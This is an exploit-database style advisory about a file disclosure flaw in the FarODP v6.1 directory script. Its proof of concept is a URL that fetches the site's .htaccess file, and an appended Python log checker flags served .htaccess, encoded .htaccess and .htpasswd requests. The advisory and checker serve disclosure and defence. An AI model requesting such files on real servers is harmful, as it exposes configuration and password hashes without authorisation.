FarODP v6.1 Remote File Disclosure Vulnerability (.htaccess)
2012-11-16 16:05:02
# Exploit Title: FarODP V6.1 Remote File Disclosure Vulnerability (.htaccess)
# Date: 15.10.201
# Exploit Author: d3b4g
# Vendor Homepage: http://www.farfarfar.com/scripts/odp/
# Software Link: http://www.farfarfar.com/dir/
# Tested on: Windows 7
# Blog: d3b4g.me
# twitter: @schaba
----------------------------------------------------------------------------------
Script Description:
-------------------
What is FarODP?
Get live data from the Open Directory Project to your own website. Let visitors
browse and search categories of websites. This script is easy to install; just upload
this script to your server. You can easily customize the layout by editing the templates.
It supports thumbnails of websites, caching, filter adult categories and searches, foreign
language support, search engine friendly mode, and URL rewriting.
() Proof of Concept:
http://localhost/path/.htaccess
() Previous versions might be vulnerable
-end-
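Added example, not part of the original advisory or of the FarODP code: a log check that finds requests where the web server actually answered for .htaccess (or another .ht* file), which is the disclosure shown in the proof of concept. It assumes Apache-style common/combined access logs; the sample lines, the IP addresses and the /dir/ path are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Common/combined log format: host ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\S+)')

def served_ht_files(lines):
    """Return (client, time, path, status) for requests where a .ht* file was served."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable access-log line
        client, when, _method, target, status, _size = m.groups()
        # Drop the query string, then decode percent-escapes (%2e -> '.') before checking.
        path = unquote(urlsplit(target).path)
        name = path.rstrip("/").rsplit("/", 1)[-1].lower()
        # 200/206 mean the server was willing to serve the file;
        # 403/404 mean the request was refused, which is the desired outcome.
        if name.startswith(".ht") and status in ("200", "206"):
            hits.append((client, when, path, status))
    return hits

# Constructed sample lines (documentation IP ranges, hypothetical /dir/ install path).
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Nov/2012:16:05:02 +0000] "GET /dir/.htaccess HTTP/1.1" 200 412',
    '203.0.113.7 - - [16/Nov/2012:16:05:09 +0000] "GET /dir/%2Ehtaccess?x=1 HTTP/1.1" 200 412',
    '198.51.100.23 - - [16/Nov/2012:16:06:11 +0000] "GET /dir/.htaccess HTTP/1.1" 403 199',
    '198.51.100.23 - - [16/Nov/2012:16:06:30 +0000] "GET /dir/index.php HTTP/1.1" 200 8120',
    '192.0.2.10 - - [16/Nov/2012:16:07:45 +0000] "GET /dir/.htpasswd HTTP/1.1" 206 64',
    '192.0.2.10 - - [16/Nov/2012:16:07:50 +0000] "GET /dir/htaccess.txt HTTP/1.1" 200 20',
]

if __name__ == "__main__":
    for client, when, path, status in served_ht_files(SAMPLE_LOG):
        print(f"{when}  {client}  {status}  {path}")
```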
Fixes
No fixes